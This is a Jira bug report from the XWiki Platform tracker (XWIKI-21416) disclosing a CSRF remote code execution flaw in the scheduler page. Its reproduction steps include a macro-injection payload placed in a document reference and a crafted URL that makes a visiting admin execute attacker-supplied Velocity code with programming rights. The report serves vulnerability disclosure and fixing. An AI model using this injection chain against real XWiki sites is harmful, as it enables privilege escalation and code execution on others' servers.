Uploaded image for project: 'XWiki Platform'
  1. XWiki Platform
  2. XWIKI-21416

CSRF remote code execution through scheduler job's document reference

    XMLWordPrintable

Details

    • Unit
    • Unknown
    • N/A
    • N/A
    • Pull Request accepted

    Description

      Steps to reproduce:

      1. As a user without script, admin or programming right but regular edit right, create a document with reference
        ">]]{{/html}}{{async context="request.parameters"}}{{velocity}}#evaluate($request.eval).WebHome

        URL for easier creation: http://localhost:8080/xwiki/bin/view/%22%3E%5D%5D%7B%7B%2Fhtml%7D%7D%7B%7Basync%20context%3D%22request/parameters%22%7D%7D%7B%7Bvelocity%7D%7D%23evaluate%28%24request/eval%29/

      2. Add an object of type XWiki.SchedulerJobClass
      3. Save
      4. Get an admin to visit http://localhost:8080/xwiki/bin/view/Scheduler/?eval=$services.logging.getLogger(%22attacker%22).error(%22Hello%20from%20URL%20Parameter!%20I%20got%20programming:%20$services.security.authorization.hasAccess(%27programming%27)%22) - e.g., write a comment with an image with that URL.

      Expected result:

      The Scheduler page is normally displayed and no error is logged.

      Actual result:

      An error "ERROR attacker - Hello from URL Parameter! I got programming: true" is logged. The layout of the job scheduler page is broken:

      Attachments

        Issue Links

          Activity

            People

              pjeanjean Pierre Jeanjean
              MichaelHamann Michael Hamann
              Votes:
              0 Vote for this issue
              Watchers:
              1 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: